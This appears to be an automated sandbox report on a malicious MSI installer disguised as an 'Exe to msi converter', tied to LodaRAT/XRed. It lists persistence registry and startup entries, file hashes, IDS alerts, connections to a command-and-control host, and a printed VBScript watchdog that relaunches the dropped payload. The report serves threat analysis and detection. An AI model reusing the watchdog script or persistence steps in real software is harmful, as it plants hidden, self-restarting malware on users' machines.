                  Number of analysed new started processes analysed:18
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:test.msi
                  Detection:MAL
                  Classification:mal100.troj.evad.winMSI@17/14@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 90
                  • Number of non-executed functions: 271
                  Cookbook Comments:
                  • Found application associated with file extension: .msi
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 4.175.87.197
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
11:36:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PAITNR "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe"
11:36:20 | Task Scheduler | Run new task: PAITNR.exe path: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
11:36:28 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PAITNR "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe"
11:36:36 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PAITNR.lnk
Match | Associated Sample Name / URL | Detection | Threat Name
172.111.138.100 | FGNEBI.exe | malicious | LodaRAT, XRed
172.111.138.100 | sdlvrr.msi | malicious | LodaRAT
172.111.138.100 | LWQDFZ.exe | malicious | LodaRAT, XRed
172.111.138.100 | JPS.exe | malicious | LodaRAT, XRed
172.111.138.100 | KOGJZW.exe | malicious | LodaRAT, XRed
172.111.138.100 | Machine-PO.exe | malicious | XRed
172.111.138.100 | AYRASY.exe | malicious | LodaRAT, XRed
172.111.138.100 | 222.exe | malicious | LodaRAT, XRed
172.111.138.100 | mmi8nLybam.exe | malicious | LodaRAT
172.111.138.100 | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed
                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VOXILITYGB | FGNEBI.exe | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | sdlvrr.msi | malicious | LodaRAT | 172.111.138.100
VOXILITYGB | LWQDFZ.exe | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | JPS.exe | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | KOGJZW.exe | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | Machine-PO.exe | malicious | XRed | 172.111.138.100
VOXILITYGB | AYRASY.exe | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | 222.exe | malicious | LodaRAT, XRed | 172.111.138.100
VOXILITYGB | mmi8nLybam.exe | malicious | LodaRAT | 172.111.138.100
VOXILITYGB | Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 172.111.138.100
                                      No context
                                      No context
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):601
                                      Entropy (8bit):5.34330113633419
                                      Encrypted:false
                                      SSDEEP:12:EgolIg8mmIdFaqXS/cqj//pFvfN2zWotHMphe2WmmY3HDyzgj82:wegThSkqjM65ptyzAh
                                      MD5:F9377FA2E0A021B41688312361CD5084
                                      SHA1:88CEF02B1138D42841D9948F149FCAD68B6FAD8F
                                      SHA-256:EAD07872F6AAE72475457F28B6FEA27DDD17F972295E9DA681C928F1C16CCC19
                                      SHA-512:9FC845ACA905C256B490047876FA8B007351F798345BD3612E95BAD83B5426A3E4AC59A0B699D0A2B062F5502BCB2A3B2AB5F8A2194C2E683ED220FC3E7F7DE5
                                      Malicious:false
                                      Preview:...@IXOS.@.....@.,.Y.@.....@.....@.....@.....@.....@......&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}..Exe to msi converter free..test.msi.@.....@.....@.....@........&.{C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}.....@.....@.....@.....@.......@.....@.....@.......@......Exe to msi converter free......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}.@........RemoveODBC..Removing ODBC components..%._B3D13F97_1369_417D_A477_B4C42B829328
                                      Process:C:\Windows\Installer\MSI77F6.tmp
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):821
                                      Entropy (8bit):5.3594344873203115
                                      Encrypted:false
                                      SSDEEP:24:dF/UmIU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UmBt+G+7xLxe0WABNVIqZaVzgA
                                      MD5:72B5E6B7A5FBEFC32C94189D1E1E4757
                                      SHA1:33F105CF7034FFB0F7CB28BC6530995A556E5F27
                                      SHA-256:5B2AF22B0AF6118FFBFF08B809F0FA25581BFDD0B59295CBDFD3B03D89A013A9
                                      SHA-512:42E9AFF255344C5E76E22F7831173FBB2BD4D14E3576A8E98D1DA2E42707D6003FDD25D107679D8F874D4C92155B0C22309CE0FF196DF12B0D3D2E7941681A7E
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\PAITNR.vbs, Author: Joe Security
                                      Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "MSI77F6.tmp"..fileset = """C:\Windows\Installer\MSI77F6.tmp"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                                      Process:C:\Windows\Installer\MSI77F6.tmp
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:36:17 2024, mtime=Mon Dec 30 09:36:17 2024, atime=Mon Dec 30 09:36:17 2024, length=947712, window=hide
                                      Category:dropped
                                      Size (bytes):1814
                                      Entropy (8bit):3.434762393239299
                                      Encrypted:false
                                      SSDEEP:24:8c7wNDV+lXU3evNlb5hALXTPBE2+s9T4Il/hm:8c7wND8lEWT5yLr5r9MIlJ
                                      MD5:C70F952B605E63BCFC042CF6FE8F1E6C
                                      SHA1:C079DF6166AB7A8C72A7AC374FDFA4136608163A
                                      SHA-256:D1A65F4C08F34414B9743BF0BE59C21BD51C07E04085FACEB4DC311E9AA26ACA
                                      SHA-512:9576849D3B1C762414E34C63C94E87E2046CAB83B4AB6F27DFBF0A15B02D17F3E1935A812CF347CA3DE1A6ED766A4591C8E5E50489ECD03E29FAF79465393740
                                      Malicious:false
                                      Preview:L..................F.@.. ...."8..Z....:..Z....:..Z...v........................:..DG..Yr?.D..U..k0.&...&.......$..S...2P...Z....Z......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.T...........................^.A.p.p.D.a.t.a...B.V.1......Y.T..Roaming.@......EW<2.Y.T..../.....................l...R.o.a.m.i.n.g.....V.1......Y.T..Windata.@......Y.T.Y.T.........................._...W.i.n.d.a.t.a.....`.2..v...Y.T .ELJQZX.exe..F......Y.T.Y.T..............................E.L.J.Q.Z.X...e.x.e.......c...............-.......b...........kd.z.....C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.E.L.J.Q.Z.X...e.x.e.,.".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll......................................................................................................
                                      Process:C:\Windows\Installer\MSI77F6.tmp
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):947712
                                      Entropy (8bit):7.851989959006576
                                      Encrypted:false
                                      SSDEEP:24576:zhloDX0XOf4mbA6xLSj7/SspRd3tp/IoqKUQTI6:zhloJfHAY+vqOdxI
                                      MD5:13AF887E6C39E427715E769CC334C83E
                                      SHA1:C05DC910ACC1FE36F948AB7BCD24142E4AB913AE
                                      SHA-256:C40CF35821B67498B5E3B1FCD09DD59039C44AE3821EA4BFDCCC0A5E4EFDA3FB
                                      SHA-512:AF426B3D840C3CB6A70A379BDC6FF3E67D6AE06B7CDA0830966ED5DBCD9F3B7D40EF79062BC76622E66C36DFAF47813E3E96CE0DC1277F1A866050BFFB5E207C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      • Antivirus: Virustotal, Detection: 52%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L.....@g.........."......P...0...P.......`........@.......................................@...@.......@.........................$........(..............................................................H...........................................UPX0.....P..............................UPX1.....P...`...D..................@....rsrc....0...........H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Code page: 1252, Last Printed: Fri Sep 21 10:56:09 2012, Create Time/Date: Fri Sep 21 10:56:09 2012, Name of Creating Application: Windows Installer, Title: Exe to msi converter free, Author: www.exetomsi.com, Template: ;0, Last Saved By: devuser, Revision Number: {C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}, Last Saved Time/Date: Tue May 21 12:56:44 2013, Number of Pages: 100, Number of Words: 0, Security: 0
                                      Category:dropped
                                      Size (bytes):974848
                                      Entropy (8bit):7.777108664035736
                                      Encrypted:false
                                      SSDEEP:24576:bEohloDX0XOf4mbA6xLSj7/SspRd3tp/IoqKUQTI6:bEohloJfHAY+vqOdxI
                                      MD5:9E62C7A7CAADA70E0CD988510E2E0838
                                      SHA1:3B2884A46AE25E424805879BD8F2E1E970C54272
                                      SHA-256:E397394A06441C8893D91907B6E7DD02BB1E5243D26697FEB924B24BB2984647
                                      SHA-512:0B5F01A25AB6B45010973B9AAAAB6475A3FEC97146FDC27E81865920E9E372B7B74D5741CC75FA5B021A607744A0CD9D156C9A26B7CECE8757F87D79969CD0CC
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):948432
                                      Entropy (8bit):7.851470907851766
                                      Encrypted:false
                                      SSDEEP:24576:jhloDX0XOf4mbA6xLSj7/SspRd3tp/IoqKUQTI6h:jhloJfHAY+vqOdxIO
                                      MD5:1C592EE9353CB59CC211B8189D5C6E13
                                      SHA1:F344C0D242C88684D730B45CE8AB5AEEE0503E15
                                      SHA-256:4CC64E9ADF84257FB9F7291985950BA4B11910725DB60B3ED35D71A3D844E9DA
                                      SHA-512:57385C00ECFDC70CE455A7940711E171408CCD66A0FAD99A2FD87D4D2EE640D72D6233E5D1C393206193C033EBDBBF84D3EE7678D5C7AA711163A72FB2652F4B
                                      Malicious:false
                                      Preview:...@IXOS.@.....@.,.Y.@.....@.....@.....@.....@.....@......&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}..Exe to msi converter free..test.msi.@.....@.....@.....@........&.{C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}.....@.....@.....@.....@.......@.....@.....@.......@......Exe to msi converter free......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}...@.......@.....@.....@........RemoveODBC..Removing ODBC components..T....@....T....@......%._B3D13F97_1369_417D_A477_B4C42B829328....J.%._B3D13F97_1369_417D_A477_B4C42B829328.@.......v..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L.....@g..........".....
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:modified
                                      Size (bytes):947712
                                      Entropy (8bit):7.851989959006576
                                      Encrypted:false
                                      SSDEEP:24576:zhloDX0XOf4mbA6xLSj7/SspRd3tp/IoqKUQTI6:zhloJfHAY+vqOdxI
                                      MD5:13AF887E6C39E427715E769CC334C83E
                                      SHA1:C05DC910ACC1FE36F948AB7BCD24142E4AB913AE
                                      SHA-256:C40CF35821B67498B5E3B1FCD09DD59039C44AE3821EA4BFDCCC0A5E4EFDA3FB
                                      SHA-512:AF426B3D840C3CB6A70A379BDC6FF3E67D6AE06B7CDA0830966ED5DBCD9F3B7D40EF79062BC76622E66C36DFAF47813E3E96CE0DC1277F1A866050BFFB5E207C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      • Antivirus: Virustotal, Detection: 52%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L.....@g.........."......P...0...P.......`........@.......................................@...@.......@.........................$........(..............................................................H...........................................UPX0.....P..............................UPX1.....P...`...D..................@....rsrc....0...........H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):49152
                                      Entropy (8bit):0.7679251964572871
                                      Encrypted:false
                                      SSDEEP:12:JSbX72FjGalAGiLIlHVRpzh/7777777777777777777777777vDHF2FOwwkLQp0V:JsalQI53Ebwkz8F
                                      MD5:3915CAAC75D1C92C893793532083C478
                                      SHA1:13D05C59CB9E2B17038AF43ECB0546AAFF86D691
                                      SHA-256:1983DF1424C3E9613FE9F9EF9E6A83AAE3884BFDF44A9488661020B52C95CC29
                                      SHA-512:E95D7D9FCB6046A0828E46BF6F5A32E02D7EC2920D38EB950CEFDAC43F3D69B03F8912B2268FE5C89C9B6A88623578F87E1FD273150B593B16C95281C44F4603
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):1.1488607792011796
                                      Encrypted:false
                                      SSDEEP:24:JRaJYh+3AmAuxhiAipKP2xza2tzhAzZdagUMClXtdd+iUJ+BmipVJ+ZVgwG2irk6:CJnLAu7NveFXJ9T5yJ0mSzUgMSzfT
                                      MD5:936553B56926FE63182ED721DD7A1EF1
                                      SHA1:1CDA9580ECF01D2E10C104EB73FBEB9E81341586
                                      SHA-256:9FC86AADBD59D0DB03619D436337539B10B8DD99F555749FDBFF1779A0EA3C7E
                                      SHA-512:4B2A295C765552C6EC7C74A67C248F4C9B97EA95575771E1597A1BD6A5666EBC666D2739519FB773ECB1CEC1F3D5AA73B3FC2F858EB40DC542150EEB610A8C05
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):360001
                                      Entropy (8bit):5.3629871472855895
                                      Encrypted:false
                                      SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauE:zTtbmkExhMJCIpEd
                                      MD5:17987419D83065C17C0957B937B5F7AD
                                      SHA1:140CCE01E73B72A47F982394A2913AA007D2AEFC
                                      SHA-256:3C11D0630C80E9F807FC16CA60F0C31190EB5343F4A248C919BB38707A8E35DE
                                      SHA-512:494657285DAFBA71E0455809BA2F2721E1DE13E39C6F8980196096C91B5C0D297C411968E186EBFFC16322156D0010305AAA7A0D31F932CAD41CDCB19F951AE8
                                      Malicious:false
                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:Composite Document File V2 Document, Cannot read section info
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):1.1488607792011796
                                      Encrypted:false
                                      SSDEEP:24:JRaJYh+3AmAuxhiAipKP2xza2tzhAzZdagUMClXtdd+iUJ+BmipVJ+ZVgwG2irk6:CJnLAu7NveFXJ9T5yJ0mSzUgMSzfT
                                      MD5:936553B56926FE63182ED721DD7A1EF1
                                      SHA1:1CDA9580ECF01D2E10C104EB73FBEB9E81341586
                                      SHA-256:9FC86AADBD59D0DB03619D436337539B10B8DD99F555749FDBFF1779A0EA3C7E
                                      SHA-512:4B2A295C765552C6EC7C74A67C248F4C9B97EA95575771E1597A1BD6A5666EBC666D2739519FB773ECB1CEC1F3D5AA73B3FC2F858EB40DC542150EEB610A8C05
                                      Malicious:false
                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):81920
                                      Entropy (8bit):0.07517293309285995
                                      Encrypted:false
                                      SSDEEP:12:5wW2syASClxvvb+ipVJ+8lqipVJ+soVjNJIiWlIC1n2s2tpqsA5GndD2+kDWG2Il:ZPTvb+ipVJ+dipVJ+ZVgwG2irkp2+0
                                      MD5:E0525D10F431063E6BE9C563A71D96CB
                                      SHA1:A01A5D60A1E461D107D9702BEEE9CC6DA34742EA
                                      SHA-256:D1529E2A29E1280188A85E4E0EE7FC9A9D1C608B0DF8C5507206FD1AAF25AE5D
                                      SHA-512:2C510ABA4A16892AC4456F00C0CE372F662F159863F0D8BFB47EAA10571DFFF2E448EA72F08E031D981E19034AC78AE1CFF3EC23545FF3C05E934FBE6593FD7C
                                      Malicious:false
                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):512
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                      Malicious:false
                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):0.06839263853294958
                                      Encrypted:false
                                      SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO2F/WwwPcsXqtoVky6l0t/:2F0i8n0itFzDHF2FOwwkzx01
                                      MD5:A60577955CB5E43728925418C4CE2D8E
                                      SHA1:28502732D11233636E3AAAF5F8BF3FD6C4D380C7
                                      SHA-256:2F973CF018C645A95814CA0D9643EA5754685535731E714AB05BD337C8666DA9
                                      SHA-512:8F2001BEAFC2C82DC7C2D43EAC647DF657A6E2DDF30BAF728FFA4DADAA1B44990560DFB34854CD28AF6DAAB4A2F2B7330BE9A19E9015BF9344F0BAFB9B1980FC
                                      Malicious:false
                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Code page: 1252, Last Printed: Fri Sep 21 10:56:09 2012, Create Time/Date: Fri Sep 21 10:56:09 2012, Name of Creating Application: Windows Installer, Title: Exe to msi converter free, Author: www.exetomsi.com, Template: ;0, Last Saved By: devuser, Revision Number: {C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}, Last Saved Time/Date: Tue May 21 12:56:44 2013, Number of Pages: 100, Number of Words: 0, Security: 0
                                      Entropy (8bit):7.777108664035736
                                      TrID:
                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                      File name:test.msi
                                      File size:974'848 bytes
                                      MD5:9e62c7a7caada70e0cd988510e2e0838
                                      SHA1:3b2884a46ae25e424805879bd8f2e1e970c54272
                                      SHA256:e397394a06441c8893d91907b6e7dd02bb1e5243d26697feb924b24bb2984647
                                      SHA512:0b5f01a25ab6b45010973b9aaaab6475a3fec97146fdc27e81865920e9e372b7b74d5741cc75fa5b021a607744a0cd9d156c9a26b7cece8757f87d79969cd0cc
                                      SSDEEP:24576:bEohloDX0XOf4mbA6xLSj7/SspRd3tp/IoqKUQTI6:bEohloJfHAY+vqOdxI
                                      TLSH:FE25E0E1A740C465E8679679943B9BA77833AE1E8C680A4C3891FF0F7D723474063D9B
                                      File Content Preview:........................>......................................................................................................................................................................................................................................
                                      Icon Hash:2d2e3797b32b2b99
                                      Timestamp                        SID      Signature                                                   Severity  Source IP        Source Port  Dest IP          Dest Port  Protocol
                                      2024-12-30T11:36:12.325655+0100  2849885  ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin  1         192.168.2.6      49762        172.111.138.100  5552       TCP
                                      2024-12-30T11:36:12.325655+0100  2849885  ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin  1         192.168.2.6      49885        172.111.138.100  5552       TCP
                                      2024-12-30T11:36:12.325655+0100  2849885  ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin  1         192.168.2.6      49986        172.111.138.100  5552       TCP
                                      2024-12-30T11:36:12.325655+0100  2849885  ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin  1         192.168.2.6      49949        172.111.138.100  5552       TCP
                                      2024-12-30T11:36:12.325655+0100  2849885  ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin  1         192.168.2.6      49988        172.111.138.100  5552       TCP
                                      2024-12-30T11:36:12.325655+0100  2849885  ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin  1         192.168.2.6      49826        172.111.138.100  5552       TCP
                                      2024-12-30T11:36:28.508339+0100  2849885  ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin  1         192.168.2.6      49762        172.111.138.100  5552       TCP
                                      2024-12-30T11:36:37.554770+0100  2849885  ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin  1         192.168.2.6      49826        172.111.138.100  5552       TCP
                                      2024-12-30T11:36:46.800558+0100  2849885  ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin  1         192.168.2.6      49885        172.111.138.100  5552       TCP
                                      2024-12-30T11:36:55.862538+0100  2849885  ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin  1         192.168.2.6      49949        172.111.138.100  5552       TCP
                                      2024-12-30T11:37:04.956730+0100  2849885  ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin  1         192.168.2.6      49986        172.111.138.100  5552       TCP
                                      2024-12-30T11:37:14.034642+0100  2849885  ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin  1         192.168.2.6      49988        172.111.138.100  5552       TCP
                                      2024-12-30T11:37:25.586902+0100  2830912  ETPRO MALWARE Loda Logger CnC Beacon Response M2            1         172.111.138.100  5552         192.168.2.6      49988      TCP
                                      2024-12-30T11:38:03.633679+0100  2830912  ETPRO MALWARE Loda Logger CnC Beacon Response M2            1         172.111.138.100  5552         192.168.2.6      49988      TCP
                                      Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                      Dec 30, 2024 11:36:28.502741098 CET  49762        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:28.507884979 CET  5552         49762      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:36:28.507987022 CET  49762        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:28.508338928 CET  49762        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:28.513200045 CET  5552         49762      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:36:30.657407999 CET  5552         49762      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:36:30.657636881 CET  49762        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:30.707663059 CET  49762        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:30.712481976 CET  5552         49762      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:36:37.549397945 CET  49826        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:37.554204941 CET  5552         49826      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:36:37.554342985 CET  49826        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:37.554769993 CET  49826        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:37.559595108 CET  5552         49826      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:36:39.681504965 CET  5552         49826      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:36:39.681587934 CET  49826        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:39.738115072 CET  49826        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:39.742892981 CET  5552         49826      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:36:46.795015097 CET  49885        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:46.799900055 CET  5552         49885      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:36:46.800237894 CET  49885        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:46.800558090 CET  49885        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:46.805293083 CET  5552         49885      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:36:49.010513067 CET  5552         49885      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:36:49.010651112 CET  49885        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:49.036078930 CET  49885        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:49.040915966 CET  5552         49885      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:36:55.857383013 CET  49949        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:55.862160921 CET  5552         49949      172.111.138.100  192.168.2.6
                                      Dec 30, 2024 11:36:55.862230062 CET  49949        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:55.862538099 CET  49949        5552       192.168.2.6      172.111.138.100
                                      Dec 30, 2024 11:36:55.867327929 CET  5552         49949      172.111.138.100  192.168.2.6
